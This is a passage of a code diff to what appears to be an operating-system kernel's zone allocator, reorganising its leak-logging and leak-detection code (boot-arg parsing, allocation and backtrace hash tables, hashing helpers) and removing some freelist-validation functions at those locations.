+ * Enable the logging via the boot-args. Add the parameter "zlog=<zone>" to boot-args where <zone>
+ * is the name of the zone you wish to log.
+ *
+ * This code only tracks one zone, so you need to identify which one is leaking first.
+ * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone
+ * garbage collector.  Note that the zone name printed in the panic message is not necessarily the one
+ * containing the leak.  So do a zprint from gdb and locate the zone with the bloated size.  This
+ * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test.  The
+ * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs.
+ * See the help in the kgmacros for usage info.
+ *
+ *
+ * Zone corruption logging
+ *
+ * Logging can also be used to help identify the source of a zone corruption.  First, identify the zone
+ * that is being corrupted, then add "-zc zlog=<zone name>" to the boot-args.  When -zc is used in conjunction
+ * with zlog, it changes the logging style to track both allocations and frees to the zone.  So when the
+ * corruption is detected, examining the log will show you the stack traces of the callers who last allocated
+ * and freed any particular element in the zone.  Use the findelem kgmacro with the address of the element that's been
+ * corrupted to examine its history.  This should lead to the source of the corruption.
+ */
+
+/* Returns TRUE if we rolled over the counter at factor */
+__header_always_inline bool
+sample_counter(volatile uint32_t *count_p, uint32_t factor)
+{
+       uint32_t old_count, new_count = 0;
+       if (count_p != NULL) {
+               os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, {
+                       new_count = old_count + 1;
+                       if (new_count >= factor) {
+                               new_count = 0;
+                       }
+               });
+       }
+
+       return new_count == 0;
+}
+
+#if ZONE_ENABLE_LOGGING
+/* Log allocations and frees to help debug a zone element corruption */
+static TUNABLE(bool, corruption_debug_flag, "-zc", false);
+
+#define MAX_NUM_ZONES_ALLOWED_LOGGING   10 /* Maximum 10 zones can be logged at once */
+
+static int  max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING;
+static int  num_zones_logged = 0;
+
+/*
+ * The number of records in the log is configurable via the zrecs parameter in boot-args.  Set this to
+ * the number of records you want in the log.  For example, "zrecs=10" sets it to 10 records. Since this
+ * is the number of stacks suspected of leaking, we don't need many records.
+ */
+
+#if defined(__LP64__)
+#define ZRECORDS_MAX            2560            /* Max records allowed in the log */
+#else
+#define ZRECORDS_MAX            1536            /* Max records allowed in the log */
+#endif
+#define ZRECORDS_DEFAULT        1024            /* default records in log if zrecs is not specificed in boot-args */
+
+static TUNABLE(uint32_t, log_records, "zrecs", ZRECORDS_DEFAULT);
+
+static void
+zone_enable_logging(zone_t z)
+{
+       z->zlog_btlog = btlog_create(log_records, MAX_ZTRACE_DEPTH,
+           (corruption_debug_flag == FALSE) /* caller_will_remove_entries_for_element? */);
+
+       if (z->zlog_btlog) {
+               printf("zone: logging started for zone %s%s\n",
+                   zone_heap_name(z), z->z_name);
+       } else {
+               printf("zone: couldn't allocate memory for zrecords, turning off zleak logging\n");
+               z->zone_logging = false;
+       }
+}
+
+/**
+ * @function zone_setup_logging
+ *
+ * @abstract
+ * Optionally sets up a zone for logging.
+ *
+ * @discussion
+ * We recognized two boot-args:
+ *
+ *     zlog=<zone_to_log>
+ *     zrecs=<num_records_in_log>
+ *
+ * The zlog arg is used to specify the zone name that should be logged,
+ * and zrecs is used to control the size of the log.
+ *
+ * If zrecs is not specified, a default value is used.
+ */
+static void
+zone_setup_logging(zone_t z)
+{
+       char zone_name[MAX_ZONE_NAME]; /* Temp. buffer for the zone name */
+       char zlog_name[MAX_ZONE_NAME]; /* Temp. buffer to create the strings zlog1, zlog2 etc... */
+       char zlog_val[MAX_ZONE_NAME];  /* the zone name we're logging, if any */
+
+       /*
+        * Don't allow more than ZRECORDS_MAX records even if the user asked for more.
+        *
+        * This prevents accidentally hogging too much kernel memory
+        * and making the system unusable.
+        */
+       if (log_records > ZRECORDS_MAX) {
+               log_records = ZRECORDS_MAX;
+       }
+
+       /*
+        * Append kalloc heap name to zone name (if zone is used by kalloc)
+        */
+       snprintf(zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name);
+
+       /* zlog0 isn't allowed. */
+       for (int i = 1; i <= max_num_zones_to_log; i++) {
+               snprintf(zlog_name, MAX_ZONE_NAME, "zlog%d", i);
+
+               if (PE_parse_boot_argn(zlog_name, zlog_val, sizeof(zlog_val)) &&
+                   track_this_zone(zone_name, zlog_val)) {
+                       z->zone_logging = true;
+                       num_zones_logged++;
+                       break;
+               }
+       }
+
+       /*
+        * Backwards compat. with the old boot-arg used to specify single zone
+        * logging i.e. zlog Needs to happen after the newer zlogn checks
+        * because the prefix will match all the zlogn
+        * boot-args.
+        */
+       if (!z->zone_logging &&
+           PE_parse_boot_argn("zlog", zlog_val, sizeof(zlog_val)) &&
+           track_this_zone(zone_name, zlog_val)) {
+               z->zone_logging = true;
+               num_zones_logged++;
+       }
+
+
+       /*
+        * If we want to log a zone, see if we need to allocate buffer space for
+        * the log.
+        *
+        * Some vm related zones are zinit'ed before we can do a kmem_alloc, so
+        * we have to defer allocation in that case.
+        *
+        * zone_init() will finish the job.
+        *
+        * If we want to log one of the VM related zones that's set up early on,
+        * we will skip allocation of the log until zinit is called again later
+        * on some other zone.
+        */
+       if (z->zone_logging && startup_phase >= STARTUP_SUB_KMEM_ALLOC) {
+               zone_enable_logging(z);
+       }
+}
+
+/*
+ * Each record in the log contains a pointer to the zone element it refers to,
+ * and a small array to hold the pc's from the stack trace.  A
+ * record is added to the log each time a zalloc() is done in the zone_of_interest.  For leak debugging,
+ * the record is cleared when a zfree() is done.  For corruption debugging, the log tracks both allocs and frees.
+ * If the log fills, old records are replaced as if it were a circular buffer.
+ */
+
+
+/*
+ * Decide if we want to log this zone by doing a string compare between a zone name and the name
+ * of the zone to log. Return true if the strings are equal, false otherwise.  Because it's not
+ * possible to include spaces in strings passed in via the boot-args, a period in the logname will
+ * match a space in the zone name.
+ */
+
+/*
+ * Test if we want to log this zalloc/zfree event.  We log if this is the zone we're interested in and
+ * the buffer for the records has been allocated.
+ */
+
+#define DO_LOGGING(z)           (z->zlog_btlog != NULL)
+#else /* !ZONE_ENABLE_LOGGING */
+#define DO_LOGGING(z)           0
+#endif /* !ZONE_ENABLE_LOGGING */
+#if CONFIG_ZLEAKS
+
+/*
+ * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding
+ * allocations made by the zone allocator.  Every zleak_sample_factor allocations in each zone, we capture a
+ * backtrace.  Every free, we examine the table and determine if the allocation was being tracked,
+ * and stop tracking it if it was being tracked.
+ *
+ * We track the allocations in the zallocations hash table, which stores the address that was returned from
+ * the zone allocator.  Each stored entry in the zallocations table points to an entry in the ztraces table, which
+ * stores the backtrace associated with that allocation.  This provides uniquing for the relatively large
+ * backtraces - we don't store them more than once.
+ *
+ * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up
+ * a large amount of virtual space.
+ */
+#define ZLEAK_STATE_ENABLED             0x01    /* Zone leak monitoring should be turned on if zone_map fills up. */
+#define ZLEAK_STATE_ACTIVE              0x02    /* We are actively collecting traces. */
+#define ZLEAK_STATE_ACTIVATING          0x04    /* Some thread is doing setup; others should move along. */
+#define ZLEAK_STATE_FAILED              0x08    /* Attempt to allocate tables failed.  We will not try again. */
+static uint32_t        zleak_state = 0;                 /* State of collection, as above */
+static unsigned int    zleak_sample_factor = 1000;      /* Allocations per sample attempt */
+
+bool            panic_include_ztrace    = FALSE;        /* Enable zleak logging on panic */
+vm_size_t       zleak_global_tracking_threshold;        /* Size of zone map at which to start collecting data */
+vm_size_t       zleak_per_zone_tracking_threshold;      /* Size a zone will have before we will collect data on it */
+
+/*
+ * Counters for allocation statistics.
+ */
+
+/* Times two active records want to occupy the same spot */
+static unsigned int z_alloc_collisions = 0;
+static unsigned int z_trace_collisions = 0;
+
+/* Times a new record lands on a spot previously occupied by a freed allocation */
+static unsigned int z_alloc_overwrites = 0;
+static unsigned int z_trace_overwrites = 0;
+
+/* Times a new alloc or trace is put into the hash table */
+static unsigned int z_alloc_recorded   = 0;
+static unsigned int z_trace_recorded   = 0;
+
+/* Times zleak_log returned false due to not being able to acquire the lock */
+static unsigned int z_total_conflicts  = 0;
+
+/*
+ * Structure for keeping track of an allocation
+ * An allocation bucket is in use if its element is not NULL
+ */
+struct zallocation {
+       uintptr_t               za_element;             /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */
+       vm_size_t               za_size;                        /* how much memory did this allocation take up? */
+       uint32_t                za_trace_index; /* index into ztraces for backtrace associated with allocation */
+       /* TODO: #if this out */
+       uint32_t                za_hit_count;           /* for determining effectiveness of hash function */
+};
+
+/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */
+static uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM;
+static uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM;
+
+vm_size_t zleak_max_zonemap_size;
+
+/* Hashmaps of allocations and their corresponding traces */
+static struct zallocation*      zallocations;
+static struct ztrace*           ztraces;
+
+/* not static so that panic can see this, see kern/debug.c */
+struct ztrace*                          top_ztrace;
+
+/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */
+static LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock");
+static LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp);
+
+/*
+ * Initializes the zone leak monitor.  Called from zone_init()
+ */
+__startup_func
+static void
+zleak_init(vm_size_t max_zonemap_size)
+{
+       char                    scratch_buf[16];
+       boolean_t               zleak_enable_flag = FALSE;
+
+       zleak_max_zonemap_size = max_zonemap_size;
+       zleak_global_tracking_threshold = max_zonemap_size / 2;
+       zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8;
+
+#if CONFIG_EMBEDDED
+       if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) {
+               zleak_enable_flag = TRUE;
+               printf("zone leak detection enabled\n");
+       } else {
+               zleak_enable_flag = FALSE;
+               printf("zone leak detection disabled\n");
+       }
+#else /* CONFIG_EMBEDDED */
+       /* -zleakoff (flag to disable zone leak monitor) */
+       if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) {
+               zleak_enable_flag = FALSE;
+               printf("zone leak detection disabled\n");
+       } else {
+               zleak_enable_flag = TRUE;
+               printf("zone leak detection enabled\n");
+       }
+#endif /* CONFIG_EMBEDDED */
+
+       /* zfactor=XXXX (override how often to sample the zone allocator) */
+       if (PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) {
+               printf("Zone leak factor override: %u\n", zleak_sample_factor);
+       }
+
+       /* zleak-allocs=XXXX (override number of buckets in zallocations) */
+       if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) {
+               printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets);
+               /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */
+               if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) {
+                       printf("Override isn't a power of two, bad things might happen!\n");
+               }
+       }
+
+       /* zleak-traces=XXXX (override number of buckets in ztraces) */
+       if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) {
+               printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets);
+               /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */
+               if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) {
+                       printf("Override isn't a power of two, bad things might happen!\n");
+               }
+       }
+
+       if (zleak_enable_flag) {
+               zleak_state = ZLEAK_STATE_ENABLED;
+       }
+}
+
+/*
+ * Support for kern.zleak.active sysctl - a simplified
+ * version of the zleak_state variable.
+ */
+int
+get_zleak_state(void)
+{
+       if (zleak_state & ZLEAK_STATE_FAILED) {
+               return -1;
+       }
+       if (zleak_state & ZLEAK_STATE_ACTIVE) {
+               return 1;
+       }
+       return 0;
+}
+
+kern_return_t
+zleak_activate(void)
+{
+       kern_return_t retval;
+       vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation);
+       vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace);
+       void *allocations_ptr = NULL;
+       void *traces_ptr = NULL;
+
+       /* Only one thread attempts to activate at a time */
+       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
+               return KERN_SUCCESS;
+       }
+
+       /* Indicate that we're doing the setup */
+       lck_spin_lock(&zleak_lock);
+       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
+               lck_spin_unlock(&zleak_lock);
+               return KERN_SUCCESS;
+       }
+
+       zleak_state |= ZLEAK_STATE_ACTIVATING;
+       lck_spin_unlock(&zleak_lock);
+
+       /* Allocate and zero tables */
+       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_DIAG);
+       if (retval != KERN_SUCCESS) {
+               goto fail;
+       }
+
+       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_DIAG);
+       if (retval != KERN_SUCCESS) {
+               goto fail;
+       }
+
+       bzero(allocations_ptr, z_alloc_size);
+       bzero(traces_ptr, z_trace_size);
+
+       /* Everything's set.  Install tables, mark active. */
+       zallocations = allocations_ptr;
+       ztraces = traces_ptr;
+
+       /*
+        * Initialize the top_ztrace to the first entry in ztraces,
+        * so we don't have to check for null in zleak_log
+        */
+       top_ztrace = &ztraces[0];
+
+       /*
+        * Note that we do need a barrier between installing
+        * the tables and setting the active flag, because the zfree()
+        * path accesses the table without a lock if we're active.
+        */
+       lck_spin_lock(&zleak_lock);
+       zleak_state |= ZLEAK_STATE_ACTIVE;
+       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
+       lck_spin_unlock(&zleak_lock);
+
+       return 0;
+
+fail:
+       /*
+        * If we fail to allocate memory, don't further tax
+        * the system by trying again.
+        */
+       lck_spin_lock(&zleak_lock);
+       zleak_state |= ZLEAK_STATE_FAILED;
+       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
+       lck_spin_unlock(&zleak_lock);
+
+       if (allocations_ptr != NULL) {
+               kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size);
+       }
+
+       if (traces_ptr != NULL) {
+               kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size);
+       }
+
+       return retval;
+}
+
+static inline void
+zleak_activate_if_needed(void)
+{
+       if (__probable((zleak_state & ZLEAK_STATE_ENABLED) == 0)) {
+               return;
+       }
+       if (zleak_state & ZLEAK_STATE_ACTIVE) {
+               return;
+       }
+       if (zone_submaps_approx_size() < zleak_global_tracking_threshold) {
+               return;
+       }
+
+       kern_return_t kr = zleak_activate();
+       if (kr != KERN_SUCCESS) {
+               printf("Failed to activate live zone leak debugging (%d).\n", kr);
+       }
+}
+
+static inline void
+zleak_track_if_needed(zone_t z)
+{
+       if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) {
+               if (!z->zleak_on &&
+                   zone_size_wired(z) >= zleak_per_zone_tracking_threshold) {
+                       z->zleak_on = true;
+               }
+       }
+}
+
+/*
+ * TODO: What about allocations that never get deallocated,
+ * especially ones with unique backtraces? Should we wait to record
+ * until after boot has completed?
+ * (How many persistent zallocs are there?)
+ */
+
 /*
- * Clear out the old next pointer and backup to avoid leaking the zone
- * poisoning cookie and so that only values on the freelist have a valid
- * cookie.
+ * This function records the allocation in the allocations table,
+ * and stores the associated backtrace in the traces table
+ * (or just increments the refcount if the trace is already recorded)
+ * If the allocation slot is in use, the old allocation is replaced with the new allocation, and
+ * the associated trace's refcount is decremented.
+ * If the trace slot is in use, it returns.
+ * The refcount is incremented by the amount of memory the allocation consumes.
+ * The return value indicates whether to try again next time.
  */
-void
-zone_clear_freelist_pointers(zone_t zone, vm_offset_t addr)
+static boolean_t
+zleak_log(uintptr_t* bt,
+    uintptr_t addr,
+    uint32_t depth,
+    vm_size_t allocation_size)
+{
+       /* Quit if there's someone else modifying the hash tables */
+       if (!lck_spin_try_lock(&zleak_lock)) {
+               z_total_conflicts++;
+               return FALSE;
+       }
+
+       struct zallocation* allocation  = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
+
+       uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets);
+       struct ztrace* trace = &ztraces[trace_index];
+
+       allocation->za_hit_count++;
+       trace->zt_hit_count++;
+
+       /*
+        * If the allocation bucket we want to be in is occupied, and if the occupier
+        * has the same trace as us, just bail.
+        */
+       if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) {
+               z_alloc_collisions++;
+
+               lck_spin_unlock(&zleak_lock);
+               return TRUE;
+       }
+
+       /* STEP 1: Store the backtrace in the traces array. */
+       /* A size of zero indicates that the trace bucket is free. */
+
+       if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) {
+               /*
+                * Different unique trace with same hash!
+                * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated
+                * and get out of the way for later chances
+                */
+               trace->zt_collisions++;
+               z_trace_collisions++;
+
+               lck_spin_unlock(&zleak_lock);
+               return TRUE;
+       } else if (trace->zt_size > 0) {
+               /* Same trace, already added, so increment refcount */
+               trace->zt_size += allocation_size;
+       } else {
+               /* Found an unused trace bucket, record the trace here! */
+               if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */
+                       z_trace_overwrites++;
+               }
+
+               z_trace_recorded++;
+               trace->zt_size                  = allocation_size;
+               memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t)));
+
+               trace->zt_depth         = depth;
+               trace->zt_collisions    = 0;
+       }
+
+       /* STEP 2: Store the allocation record in the allocations array. */
+
+       if (allocation->za_element != (uintptr_t) 0) {
+               /*
+                * Straight up replace any allocation record that was there.  We don't want to do the work
+                * to preserve the allocation entries that were there, because we only record a subset of the
+                * allocations anyways.
+                */
+
+               z_alloc_collisions++;
+
+               struct ztrace* associated_trace = &ztraces[allocation->za_trace_index];
+               /* Knock off old allocation's size, not the new allocation */
+               associated_trace->zt_size -= allocation->za_size;
+       } else if (allocation->za_trace_index != 0) {
+               /* Slot previously used but not currently in use */
+               z_alloc_overwrites++;
+       }
+
+       allocation->za_element          = addr;
+       allocation->za_trace_index      = trace_index;
+       allocation->za_size             = allocation_size;
+
+       z_alloc_recorded++;
+
+       if (top_ztrace->zt_size < trace->zt_size) {
+               top_ztrace = trace;
+       }
+
+       lck_spin_unlock(&zleak_lock);
+       return TRUE;
+}
+
+/*
+ * Free the allocation record and release the stacktrace.
+ * This should be as fast as possible because it will be called for every free.
+ */
+__attribute__((noinline))
+static void
+zleak_free(uintptr_t addr,
+    vm_size_t allocation_size)
 {
-       vm_offset_t perm_value = 0;
+       if (addr == (uintptr_t) 0) {
+               return;
+       }
+
+       struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
+
+       /* Double-checked locking: check to find out if we're interested, lock, check to make
+        * sure it hasn't changed, then modify it, and release the lock.
+        */
+
+       if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
+               /* if the allocation was the one, grab the lock, check again, then delete it */
+               lck_spin_lock(&zleak_lock);
+
+               if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
+                       struct ztrace *trace;
+
+                       /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! */
+                       if (allocation->za_size != allocation_size) {
+                               panic("Freeing as size %lu memory that was allocated with size %lu\n",
+                                   (uintptr_t)allocation_size, (uintptr_t)allocation->za_size);
+                       }
+
+                       trace = &ztraces[allocation->za_trace_index];
+
+                       /* size of 0 indicates trace bucket is unused */
+                       if (trace->zt_size > 0) {
+                               trace->zt_size -= allocation_size;
+                       }
 
-       if (!zone->zfree_clear_mem) {
-               perm_value = ZONE_POISON;
+                       /* A NULL element means the allocation bucket is unused */
+                       allocation->za_element = 0;
+               }
+               lck_spin_unlock(&zleak_lock);
        }
+}
 
-       vm_offset_t *primary  = (vm_offset_t *) addr;
-       vm_offset_t *backup   = get_backup_ptr(zone_elem_size(zone), primary);
-
-       *primary = perm_value;
-       *backup  = perm_value;
+#else
+static inline void
+zleak_activate_if_needed(void)
+{
 }
 
-#if ZALLOC_ENABLE_POISONING
-__abortlike
-static void
-zone_element_not_clear_panic(zone_t zone, void *addr)
+static inline void
+zleak_track_if_needed(__unused zone_t z)
 {
-       panic("Zone element %p was modified after free for zone %s%s: "
-           "Expected element to be cleared", addr, zone_heap_name(zone),
-           zone->z_name);
 }
+#endif /* CONFIG_ZLEAKS */
+#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
 
-/*
- * Validate that the element was not tampered with while it was in the
- * freelist.
- */
-void
-zalloc_validate_element(zone_t zone, vm_offset_t addr, vm_size_t size, bool validate)
+__attribute__((noinline))
+static void
+zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr, void *fp)
 {
-       if (zone->percpu) {
-               assert(zone->zfree_clear_mem);
-               zpercpu_foreach_cpu(i) {
-                       if (memcmp_zero_ptr_aligned((void *)(addr + ptoa(i)), size)) {
-                               zone_element_not_clear_panic(zone, (void *)(addr + ptoa(i)));
+       uintptr_t       zbt[MAX_ZTRACE_DEPTH];  /* used in zone leak logging and zone leak detection */
+       unsigned int    numsaved = 0;
+
+#if ZONE_ENABLE_LOGGING
+       if (DO_LOGGING(zone)) {
+               numsaved = backtrace(zbt, MAX_ZTRACE_DEPTH, NULL);
+               btlog_add_entry(zone->zlog_btlog, (void *)addr,
+                   ZOP_ALLOC, (void **)zbt, numsaved);
+       }
+#endif /* ZONE_ENABLE_LOGGING */
+
+#if CONFIG_ZLEAKS
+       /*
+        * Zone leak detection: capture a backtrace every zleak_sample_factor
+        * allocations in this zone.
+        */
+       if (__improbable(zone->zleak_on)) {
+               if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) {
+                       /* Avoid backtracing twice if zone logging is on */
+                       if (numsaved == 0) {
+                               numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL);
+                       }
+                       /* Sampling can fail if another sample is happening at the same time in a different zone. */
+                       if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) {
+                               /* If it failed, roll back the counter so we sample the next allocation instead. */
+                               zone->zleak_capture = zleak_sample_factor;
                        }
                }
-       } else if (zone->zfree_clear_mem) {
-               if (memcmp_zero_ptr_aligned((void *)addr, size)) {
-                       zone_element_not_clear_panic(zone, (void *)addr);
-               }
-       } else if (__improbable(validate)) {
-               const vm_offset_t *p   = (vm_offset_t *)addr;
-               const vm_offset_t *end = (vm_offset_t *)(addr + size);
+       }
 
-               for (; p < end; p++) {
-                       if (*p != ZONE_POISON) {
-                               zone_element_was_modified_panic(zone, addr,
-                                   *p, ZONE_POISON, (vm_offset_t)p - addr);
-                       }
+       if (__improbable(zone_leaks_scan_enable &&
+           !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) {
+               unsigned int count, idx;
+               /* Fill element, from tail, with backtrace in reverse order */
+               if (numsaved == 0) {
+                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL);
                }
-       } else {
-               /*
-                * If element wasn't poisoned or entirely cleared, validate that the
-                * minimum bytes that were cleared on free haven't been corrupted.
-                * addr is advanced by ptr size as we have already validated and cleared
-                * the freelist pointer/zcache canary.
-                */
-               if (memcmp_zero_ptr_aligned((void *) (addr + sizeof(vm_offset_t)),
-                   zp_min_size - sizeof(vm_offset_t))) {
-                       zone_element_not_clear_panic(zone, (void *)addr);
+               count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t));
+               if (count >= numsaved) {
+                       count = numsaved - 1;
+               }
+               for (idx = 0; idx < count; idx++) {
+                       ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1];
                }
        }
+#endif /* CONFIG_ZLEAKS */
 }
-#endif /* ZALLOC_ENABLE_POISONING */
 
-#pragma mark Zone Leak Detection
+static inline bool
+zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size)
+{
+#if ZONE_ENABLE_LOGGING
+       if (DO_LOGGING(zone)) {
+               return true;
+       }
+#endif /* ZONE_ENABLE_LOGGING */
+#if CONFIG_ZLEAKS
+       /*
+        * Zone leak detection: capture a backtrace every zleak_sample_factor
+        * allocations in this zone.
+        */
+       if (zone->zleak_on) {
+               return true;
+       }
+       if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) {
+               return true;
+       }
+#endif /* CONFIG_ZLEAKS */
+       return false;
+}
 
-/*
- * Zone leak debugging code
- *
- * When enabled, this code keeps a log to track allocations to a particular zone that have not
- * yet been freed.  Examining this log will reveal the source of a zone leak.  The log is allocated
- * only when logging is enabled, so there is no effect on the system when it's turned off.  Logging is
- * off by default.
- *
- * Enable the logging via the boot-args. Add the parameter "zlog=<zone>" to boot-args where <zone>
- * is the name of the zone you wish to log.
- *
- * This code only tracks one zone, so you need to identify which one is leaking first.
- * Generally, you'll know you have a leak when you get a "zalloc retry failed 3" panic from the zone
- * garbage collector.  Note that the zone name printed in the panic message is not necessarily the one
- * containing the leak.  So do a zprint from gdb and locate the zone with the bloated size.  This
- * is most likely the problem zone, so set zlog in boot-args to this zone name, reboot and re-run the test.  The
- * next time it panics with this message, examine the log using the kgmacros zstack, findoldest and countpcs.
- * See the help in the kgmacros for usage info.
- *
- *
- * Zone corruption logging
- *
- * Logging can also be used to help identify the source of a zone corruption.  First, identify the zone
- * that is being corrupted, then add "-zc zlog=<zone name>" to the boot-args.  When -zc is used in conjunction
- * with zlog, it changes the logging style to track both allocations and frees to the zone.  So when the
- * corruption is detected, examining the log will show you the stack traces of the callers who last allocated
- * and freed any particular element in the zone.  Use the findelem kgmacro with the address of the element that's been
- * corrupted to examine its history.  This should lead to the source of the corruption.
- */
+#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
+#if ZONE_ENABLE_LOGGING
 
-/* Returns TRUE if we rolled over the counter at factor */
-__header_always_inline bool
-sample_counter(volatile uint32_t *count_p, uint32_t factor)
+__attribute__((noinline))
+static void
+zfree_log_trace(zone_t zone, vm_offset_t addr, void *fp)
 {
-       uint32_t old_count, new_count = 0;
-       if (count_p != NULL) {
-               os_atomic_rmw_loop(count_p, old_count, new_count, relaxed, {
-                       new_count = old_count + 1;
-                       if (new_count >= factor) {
-                               new_count = 0;
-                       }
-               });
+       /*
+        * See if we're doing logging on this zone.
+        *
+        * There are two styles of logging used depending on
+        * whether we're trying to catch a leak or corruption.
+        */
+       if (__improbable(DO_LOGGING(zone))) {
+               if (corruption_debug_flag) {
+                       uintptr_t       zbt[MAX_ZTRACE_DEPTH];
+                       unsigned int    numsaved;
+                       /*
+                        * We're logging to catch a corruption.
+                        *
+                        * Add a record of this zfree operation to log.
+                        */
+                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, fp, NULL);
+                       btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE,
+                           (void **)zbt, numsaved);
+               } else {
+                       /*
+                        * We're logging to catch a leak.
+                        *
+                        * Remove any record we might have for this element
+                        * since it's being freed.  Note that we may not find it
+                        * if the buffer overflowed and that's OK.
+                        *
+                        * Since the log is of a limited size, old records get
+                        * overwritten if there are more zallocs than zfrees.
+                        */
+                       btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr);
+               }
        }
+}
 
-       return new_count == 0;
+#endif /* ZONE_ENABLE_LOGGING */
+
+/*  These functions outside of CONFIG_ZLEAKS because they are also used in
+ *  mbuf.c for mbuf leak-detection.  This is why they lack the z_ prefix.
+ */
+
+/* "Thomas Wang's 32/64 bit mix functions."  http://www.concentric.net/~Ttwang/tech/inthash.htm */
+uintptr_t
+hash_mix(uintptr_t x)
+{
+#ifndef __LP64__
+       x += ~(x << 15);
+       x ^=  (x >> 10);
+       x +=  (x << 3);
+       x ^=  (x >> 6);
+       x += ~(x << 11);
+       x ^=  (x >> 16);
+#else
+       x += ~(x << 32);
+       x ^=  (x >> 22);
+       x += ~(x << 13);
+       x ^=  (x >> 8);
+       x +=  (x << 3);
+       x ^=  (x >> 15);
+       x += ~(x << 27);
+       x ^=  (x >> 31);
+#endif
+       return x;
 }
 
-#if ZONE_ENABLE_LOGGING
-/* Log allocations and frees to help debug a zone element corruption */
-TUNABLE(bool, corruption_debug_flag, "-zc", false);
+uint32_t
+hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size)
+{
+       uintptr_t hash = 0;
+       uintptr_t mask = max_size - 1;
 
-#define MAX_NUM_ZONES_ALLOWED_LOGGING   10 /* Maximum 10 zones can be logged at once */
+       while (depth) {
+               hash += bt[--depth];
+       }
 
-static int  max_num_zones_to_log = MAX_NUM_ZONES_ALLOWED_LOGGING;
-static int  num_zones_logged = 0;
+       hash = hash_mix(hash) & mask;
+
+       assert(hash < max_size);
+
+       return (uint32_t) hash;
+}
 
 /*
- * The number of records in the log is configurable via the zrecs parameter in boot-args.  Set this to
- * the number of records you want in the log.  For example, "zrecs=10" sets it to 10 records. Since this
- * is the number of stacks suspected of leaking, we don't need many records.
+ *  TODO: Determine how well distributed this is
+ *      max_size must be a power of 2. i.e 0x10000 because 0x10000-1 is 0x0FFFF which is a great bitmask
+ */
+uint32_t
+hashaddr(uintptr_t pt, uint32_t max_size)
+{
+       uintptr_t hash = 0;
+       uintptr_t mask = max_size - 1;
+
+       hash = hash_mix(pt) & mask;
+
+       assert(hash < max_size);
+
+       return (uint32_t) hash;
+}
+
+#endif /* !ZALLOC_TEST */
+#pragma mark zone (re)fill
+#if !ZALLOC_TEST
+
